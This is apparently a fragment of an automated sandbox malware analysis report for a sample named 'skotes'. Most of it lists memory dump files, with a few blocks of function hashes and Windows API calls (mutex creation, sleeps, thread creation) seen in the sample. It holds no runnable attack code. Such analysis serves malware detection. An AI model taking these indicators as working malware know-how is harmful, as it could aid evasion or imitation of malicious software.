                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: 90cb2731fd3dacd16517336279ebc52ad32b56d51c0a2ac0e05281567fbe1efb
                                                                                                                                                                                            • Instruction ID: ce222af9f064a3a7398308826ea071282e592210d558f4191cb4257d9a44039d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 90cb2731fd3dacd16517336279ebc52ad32b56d51c0a2ac0e05281567fbe1efb
                                                                                                                                                                                            • Instruction Fuzzy Hash: ED312631B943049BEB0CDBBCCD89BAEB773DB85360F248658E0149B3D6C77589808796
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0060A7BA
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: f704052e9f9118e905752ff9b41f2cc508b546b84475914d0351b57bb954cc02
                                                                                                                                                                                            • Instruction ID: dda132bed269557c3878c8c7895124418b3a653742c7e5782b8486a624034a7e
                                                                                                                                                                                            • Opcode Fuzzy Hash: f704052e9f9118e905752ff9b41f2cc508b546b84475914d0351b57bb954cc02
                                                                                                                                                                                            • Instruction Fuzzy Hash: B3312831B943049BEB0CDBACCD89BAEB773EBC5310F248618E014973D5D77589818752
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: 0f230c16a9f80536def83986155a08e1f8efba4747f23250c94762e192380cca
                                                                                                                                                                                            • Instruction ID: a1a68dec1c01f115b0731fdaf80caddb6bbf29f9c16bdf416178abd0b1f69292
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f230c16a9f80536def83986155a08e1f8efba4747f23250c94762e192380cca
                                                                                                                                                                                            • Instruction Fuzzy Hash: 01E086317FE31496E71437EC9D5EB6E612B87EA750F212924E504C63D5CBD0864045A3
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,8FC8FEA1,?,00000000,00649138,000000FF), ref: 006075CC
                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00607430,00668638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 006076BF
                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006076C9
                                                                                                                                                                                              • Part of subcall function 0061D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0061D17B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 79123409-0
                                                                                                                                                                                            • Opcode ID: d0276058d03753d3012f113c2483f4e7fd9f6994021abfc7cb3a62ffb0fb08bb
                                                                                                                                                                                            • Instruction ID: 9c6201b18bb3ee83d6ab8f7ab033471bb2bf4d5bd1ae6de1db31a0f85b7e4ec5
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0276058d03753d3012f113c2483f4e7fd9f6994021abfc7cb3a62ffb0fb08bb
                                                                                                                                                                                            • Instruction Fuzzy Hash: B051D070690248AFEB18CF38DC85B9D3BA3EB45304F544659F815C73E1CBBAE8808B95
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
